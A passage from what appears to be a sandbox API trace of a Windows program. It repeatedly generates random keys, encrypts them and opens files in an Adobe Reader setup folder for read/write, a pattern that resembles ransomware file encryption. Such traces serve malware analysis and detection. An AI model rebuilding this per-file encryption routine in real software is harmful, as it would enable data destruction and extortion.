(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0180.009] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e2c0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e2c0*=0x2ac, lpOverlapped=0x0) returned 1 [0180.009] CloseHandle (hObject=0xb0) returned 1 [0180.009] GetProcessHeap () returned 0x2c0000 [0180.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e87430 | out: hHeap=0x2c0000) returned 1 [0180.009] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e260 | out: pbBuffer=0x57e260) returned 1 [0180.009] GetProcessHeap () returned 0x2c0000 [0180.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.009] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e258*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e258*=0x30) returned 1 [0180.009] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\setup.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.009] GetProcessHeap () returned 0x2c0000 [0180.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.010] GetProcessHeap () returned 0x2c0000 [0180.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee6cc0 | out: hHeap=0x2c0000) returned 1 [0180.010] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e258 | out: pbBuffer=0x57e258) returned 1 [0180.010] GetProcessHeap () returned 0x2c0000 [0180.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.010] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e250*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e250*=0x30) returned 1 [0180.010] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Setup.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.010] GetProcessHeap () returned 0x2c0000 [0180.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.010] GetProcessHeap () returned 0x2c0000 [0180.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee6b98 | out: hHeap=0x2c0000) returned 1 [0180.010] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e258 | out: pbBuffer=0x57e258) returned 1 [0180.010] GetProcessHeap () returned 0x2c0000 [0180.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.010] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e250*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e250*=0x30) returned 1 [0180.010] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Data1.cab" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.011] GetProcessHeap () returned 0x2c0000 [0180.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.011] GetProcessHeap () returned 0x2c0000 [0180.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee6a70 | out: hHeap=0x2c0000) returned 1 [0180.011] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e250 | out: pbBuffer=0x57e250) returned 1 [0180.011] GetProcessHeap () returned 0x2c0000 [0180.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.011] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e248*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e248*=0x30) returned 1 [0180.011] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\AcroRead.msi" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\acroread.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.011] GetProcessHeap () returned 0x2c0000 [0180.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.012] GetProcessHeap () returned 0x2c0000 [0180.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee6948 | out: hHeap=0x2c0000) returned 1 [0180.012] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e250 | out: pbBuffer=0x57e250) returned 1 [0180.012] GetProcessHeap () returned 0x2c0000 [0180.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.012] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e248*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e248*=0x30) returned 1 [0180.012] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\ABCPY.INI" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\abcpy.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.012] GetProcessHeap () returned 0x2c0000 [0180.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.012] GetProcessHeap () returned 0x2c0000 [0180.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee6820 | out: hHeap=0x2c0000) returned 1 [0180.012] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e248 | out: pbBuffer=0x57e248) returned 1 [0180.013] GetProcessHeap () returned 0x2c0000 [0180.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.013] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e240*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e240*=0x30) returned 1 [0180.013] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\2052.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\2052.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.013] GetProcessHeap () returned 0x2c0000 [0180.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.013] GetProcessHeap () returned 0x2c0000 [0180.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee66f8 | out: hHeap=0x2c0000) returned 1 [0180.013] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e248 | out: pbBuffer=0x57e248) returned 1 [0180.013] GetProcessHeap () returned 0x2c0000 [0180.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.013] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e240*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e240*=0x30) returned 1 [0180.013] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1069.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1069.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.013] GetProcessHeap () returned 0x2c0000 [0180.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.013] GetProcessHeap () returned 0x2c0000 [0180.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee65d0 | out: hHeap=0x2c0000) returned 1 [0180.013] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e240 | out: pbBuffer=0x57e240) returned 1 [0180.014] GetProcessHeap () returned 0x2c0000 [0180.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.014] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e238*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e238*=0x30) returned 1 [0180.014] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1060.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1060.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.014] GetProcessHeap () returned 0x2c0000 [0180.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.014] GetProcessHeap () returned 0x2c0000 [0180.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee64a8 | out: hHeap=0x2c0000) returned 1 [0180.014] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e240 | out: pbBuffer=0x57e240) returned 1 [0180.014] GetProcessHeap () returned 0x2c0000 [0180.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.014] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e238*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e238*=0x30) returned 1 [0180.014] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1058.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1058.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.016] GetProcessHeap () returned 0x2c0000 [0180.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.016] GetProcessHeap () returned 0x2c0000 [0180.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee6380 | out: hHeap=0x2c0000) returned 1 [0180.016] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e238 | out: pbBuffer=0x57e238) returned 1 [0180.016] GetProcessHeap () returned 0x2c0000 [0180.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.016] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e230*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e230*=0x30) returned 1 [0180.016] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1055.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1055.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.017] GetProcessHeap () returned 0x2c0000 [0180.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.017] GetProcessHeap () returned 0x2c0000 [0180.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee6258 | out: hHeap=0x2c0000) returned 1 [0180.017] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e238 | out: pbBuffer=0x57e238) returned 1 [0180.017] GetProcessHeap () returned 0x2c0000 [0180.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.017] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e230*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e230*=0x30) returned 1 [0180.017] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1053.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1053.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.019] GetProcessHeap () returned 0x2c0000 [0180.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.019] GetProcessHeap () returned 0x2c0000 [0180.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee6130 | out: hHeap=0x2c0000) returned 1 [0180.020] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e230 | out: pbBuffer=0x57e230) returned 1 [0180.020] GetProcessHeap () returned 0x2c0000 [0180.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.020] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e228*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e228*=0x30) returned 1 [0180.020] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1051.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1051.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.020] GetProcessHeap () returned 0x2c0000 [0180.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.020] GetProcessHeap () returned 0x2c0000 [0180.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee6008 | out: hHeap=0x2c0000) returned 1 [0180.021] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e230 | out: pbBuffer=0x57e230) returned 1 [0180.021] GetProcessHeap () returned 0x2c0000 [0180.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.021] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e228*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e228*=0x30) returned 1 [0180.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1050.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1050.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.021] GetProcessHeap () returned 0x2c0000 [0180.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.022] GetProcessHeap () returned 0x2c0000 [0180.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee5ee0 | out: hHeap=0x2c0000) returned 1 [0180.022] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e228 | out: pbBuffer=0x57e228) returned 1 [0180.022] GetProcessHeap () returned 0x2c0000 [0180.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.022] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e220*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e220*=0x30) returned 1 [0180.022] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1049.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1049.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.022] GetProcessHeap () returned 0x2c0000 [0180.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.022] GetProcessHeap () returned 0x2c0000 [0180.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee5db8 | out: hHeap=0x2c0000) returned 1 [0180.022] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e228 | out: pbBuffer=0x57e228) returned 1 [0180.022] GetProcessHeap () returned 0x2c0000 [0180.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.022] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e220*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e220*=0x30) returned 1 [0180.022] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1048.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1048.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.023] GetProcessHeap () returned 0x2c0000 [0180.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.042] GetProcessHeap () returned 0x2c0000 [0180.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee5c90 | out: hHeap=0x2c0000) returned 1 [0180.042] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e220 | out: pbBuffer=0x57e220) returned 1 [0180.042] GetProcessHeap () returned 0x2c0000 [0180.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.042] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e218*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e218*=0x30) returned 1 [0180.042] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1046.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1046.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.043] GetProcessHeap () returned 0x2c0000 [0180.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.043] GetProcessHeap () returned 0x2c0000 [0180.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e819b8 | out: hHeap=0x2c0000) returned 1 [0180.043] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e220 | out: pbBuffer=0x57e220) returned 1 [0180.043] GetProcessHeap () returned 0x2c0000 [0180.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.043] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e218*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e218*=0x30) returned 1 [0180.043] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1045.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1045.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.047] GetProcessHeap () returned 0x2c0000 [0180.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.047] GetProcessHeap () returned 0x2c0000 [0180.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8ad60 | out: hHeap=0x2c0000) returned 1 [0180.047] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e218 | out: pbBuffer=0x57e218) returned 1 [0180.047] GetProcessHeap () returned 0x2c0000 [0180.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.047] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e210*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e210*=0x30) returned 1 [0180.047] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1043.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1043.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.047] GetProcessHeap () returned 0x2c0000 [0180.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.047] GetProcessHeap () returned 0x2c0000 [0180.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8ab10 | out: hHeap=0x2c0000) returned 1 [0180.048] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e218 | out: pbBuffer=0x57e218) returned 1 [0180.048] GetProcessHeap () returned 0x2c0000 [0180.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.048] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e210*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e210*=0x30) returned 1 [0180.048] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1042.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1042.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.048] GetProcessHeap () returned 0x2c0000 [0180.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.048] GetProcessHeap () returned 0x2c0000 [0180.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8a9e8 | out: hHeap=0x2c0000) returned 1 [0180.048] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e210 